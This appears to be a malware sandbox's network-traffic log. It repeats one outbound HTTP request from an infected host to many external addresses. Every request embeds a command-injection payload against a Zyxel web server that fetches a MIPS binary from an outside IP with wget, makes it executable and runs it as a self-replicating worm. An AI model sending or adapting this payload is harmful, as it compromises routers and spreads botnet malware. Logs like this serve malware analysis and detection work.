                                            Jan 14, 2024 15:50:29.243470907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1371192.168.2.233893259.61.82.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243494987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1372192.168.2.2341092148.122.242.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243525028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1373192.168.2.233672683.41.207.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243573904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1374192.168.2.235250499.58.163.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243606091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1375192.168.2.233305459.19.119.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243648052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1376192.168.2.234956013.126.106.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243678093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1377192.168.2.234362285.249.72.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243712902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1378192.168.2.2334264105.23.184.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243740082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1379192.168.2.2345092170.80.115.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243777037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1380192.168.2.2352386123.204.29.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243803978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1381192.168.2.234970476.27.13.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243851900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1382192.168.2.235827888.232.15.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243851900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1383192.168.2.2360254142.80.1.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243885994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1384192.168.2.2352434113.153.58.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243916035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1385192.168.2.2349282134.150.138.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243963003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1386192.168.2.236096437.213.186.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243982077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1387192.168.2.233976442.94.23.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243988991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1388192.168.2.233944490.158.51.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244025946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1389192.168.2.236006892.66.103.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244056940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1390192.168.2.233329472.189.152.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244117975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1391192.168.2.2356326221.9.34.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244146109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1392192.168.2.236009834.87.183.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244184017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1393192.168.2.233451647.196.18.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244199991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1394192.168.2.2358416166.226.7.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244205952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1395192.168.2.2338514134.168.154.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244247913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1396192.168.2.2344528138.189.111.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244267941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1397192.168.2.2345330170.242.115.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244312048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1398192.168.2.2357858112.36.87.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244324923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1399192.168.2.2350648177.238.217.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244376898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1400192.168.2.234451251.31.67.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244389057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1401192.168.2.2357510137.75.28.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244429111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1402192.168.2.233675676.30.216.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244442940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1403192.168.2.2350996207.225.172.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244473934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1404192.168.2.233357058.180.20.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244492054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1405192.168.2.2349654163.205.144.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244538069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1406192.168.2.234108852.37.230.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244545937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1407192.168.2.2344532144.140.110.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244558096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1408192.168.2.2350690170.168.78.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244594097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1409192.168.2.235235859.153.77.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244618893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1410192.168.2.2356200217.69.150.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244628906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1411192.168.2.234775860.255.96.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244680882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1412192.168.2.2332928132.233.10.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244704962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1413192.168.2.234814037.73.63.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244738102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1414192.168.2.2339408194.125.92.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244779110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1415192.168.2.234170646.129.242.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244801044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1416192.168.2.2354500159.195.241.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244829893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1417192.168.2.2348504200.33.47.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244838953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1418192.168.2.2336096147.253.181.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244889021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1419192.168.2.2336700210.243.254.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244915009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1420192.168.2.2351374207.164.243.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244930029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1421192.168.2.235500297.188.203.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.244960070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1422192.168.2.234255049.87.2.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245013952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1423192.168.2.233921851.194.31.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245032072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1424192.168.2.2334760179.135.123.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245080948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1425192.168.2.233658069.2.221.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245105982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1426192.168.2.233870499.180.13.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245167971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1427192.168.2.2349816222.232.168.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245198011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1428192.168.2.2354496183.189.138.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245238066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1429192.168.2.2335838128.209.137.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245259047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1430192.168.2.2359236152.74.156.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245261908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1431192.168.2.2343598185.112.12.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245292902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1432192.168.2.235122463.41.75.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245342016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1433192.168.2.2356880133.99.176.95443
                                            TimestampBytes transferredDirectionData
